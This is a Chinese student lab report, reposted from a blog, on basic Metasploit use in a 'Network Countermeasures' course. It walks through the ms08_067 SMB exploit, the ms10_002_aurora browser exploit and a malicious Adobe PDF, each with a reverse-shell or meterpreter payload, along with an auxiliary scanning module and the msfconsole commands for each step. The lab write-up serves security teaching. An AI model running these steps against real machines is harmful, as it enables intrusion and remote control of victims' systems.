码迷,mamicode.com
首页 > 其他好文 > 详细

20155304《网络对抗》MSF基础应用

时间:2018-05-04 01:34:00      阅读:185      评论:0      收藏:0      [点我收藏+]

标签:控制   str   roo   local   windows   不同   目录   session   打开   

20155304《网络对抗》MSF基础应用

实践内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践,如ms08_067;

1.2 一个针对浏览器的攻击,如ms11_050;

1.3 一个针对客户端的攻击,如Adobe;

1.4 成功应用任何一个辅助模块。

1.1主动攻击:ms08_067

使用靶机1和Kali

先msfconsole进入msf,再用search ms08_067查询一下针对该漏洞的攻击模块:

技术分享图片

用use exploit/windows/smb/ms08_067_netapi使用该模块

用show targets查看可以被攻击的靶机的操作系统型号:

技术分享图片

用show payloads查看可以供我们使用的攻击载荷:

技术分享图片

从中找到一个可用的攻击载荷generic/shell_reverse_tcp,用set payload generic/shell_reverse_tcp设置payload:

用show options查看需要设置的参数:

技术分享图片

这里需要设置RHOST(靶机IP)和LHOST(Kali的IP)

技术分享图片

设置target选项目标

技术分享图片

用show options确认需要设置的参数是否已经设置好:

技术分享图片

用exploit指令开始攻击

攻击成功后会获取靶机的shell,可以对其进行操作:

技术分享图片

1.2针对浏览器的攻击:MS10_002_aurora漏洞攻击

msf > use windows/browser/ms10_002_aurora调用出该模块,然后设置tcp反弹连接

技术分享图片

查看需要修改的参数

技术分享图片

SRVHOST和LHOST的ip为攻击机的ip。设置好参数后,exploit

技术分享图片

攻击成功,输入sessions -i -1,查看XP桌面信息

技术分享图片

还有靶机的ip信息等

技术分享图片

1.3针对客户端的攻击:adobe_toolbutton

用search adobe查询一下针对该漏洞的攻击模块:

技术分享图片

选择一个模块使用

用show targets查看可以被攻击的靶机的操作系统型号:

技术分享图片

技术分享图片

,使用命令set payload windows/meterpreter/reverse_tcp设置payload攻击载荷

用show options查看需要设置的参数:

技术分享图片

技术分享图片

设置相应参数,实施exploit攻击,在/root/.msf4/local/目录下成功生成了一.pdf文件

将pdf文件粘贴到靶机win xp

在kali中和前几次实验一样打开并设置监听模块use exploit/multi/handler,set payload windows/meterpreter/reverse_tcp,再设置IP以及端口

技术分享图片

在靶机上打开刚刚那个pdf文件,可以观察到Kali成功获取了靶机的shell,可以对其进行操作:

技术分享图片

1.4 成功应用任何一个辅助模块:

查看都有什么辅助模块:

技术分享图片

我选择了这个

技术分享图片

info查看、设置好要设置的参数

技术分享图片

可以查看系统信息了:

技术分享图片

基础问题回答

(1)用自己的话解释什么是exploit,payload,encode.

exploit:是破除门锁的工具以及运送间谍的载具,相当于利用漏洞偷偷打开的管道,将做好的木马病毒等顺利传输到靶机。

payload:就是被运送的间谍,到了房子里头就可以执行各种间谍活动。简单来说就是病毒代码包装成一个可执行的文件,或者包装成指定的类型,然后通过管道传输进去后开始为我们控制靶机服务。

encode:是间谍穿的伪装的衣服,便于间谍潜入目标针对payload进行编码,就是对它进行包装打扮,改变payload代码特征,但是不改变payload为我们所用的特征,但能对payload进行加工。

实验总结和收获

通过这次实验,我了解到了msf平台的厉害,不仅可以利用多种辅助模块获取靶机信息,还能够查看大部分存在的漏洞并利用这些漏洞实现不同攻击,这里面,更是可以直接实现主动攻击,只要系统存在这个漏洞,就会被直接攻破,看来,实时更新系统是很有必要的

20155304《网络对抗》MSF基础应用

标签:控制   str   roo   local   windows   不同   目录   session   打开   

原文地址:https://www.cnblogs.com/tyn5304/p/8988086.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!